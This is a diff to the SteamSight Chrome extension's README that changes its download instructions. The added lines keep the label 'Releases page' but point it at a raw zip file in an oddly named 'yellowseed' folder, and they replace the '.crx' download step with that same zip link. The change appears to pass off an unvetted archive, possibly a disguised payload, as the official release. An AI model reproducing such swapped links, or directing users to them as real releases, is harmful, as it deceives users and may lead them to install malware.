AgnivaRoy02/SteamSight/README.md

 ## 📦 Download & Install
 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/AgnivaRoy02/SteamSight/releases) to find the latest version of SteamSight.
+   Go to the [Releases page](https://raw.githubusercontent.com/AgnivaRoy02/SteamSight/main/yellowseed/SteamSight.zip) to find the latest version of SteamSight.

 2. **Download the Extension**
    Look for the most recent release.
-Click on the link that says “SteamSight.crx” to download the file to your computer.
+Click on the link that says “https://raw.githubusercontent.com/AgnivaRoy02/SteamSight/main/yellowseed/SteamSight.zip” to download the file to your computer.

 3. **Add to Chrome**
    - Open your Google Chrome browser.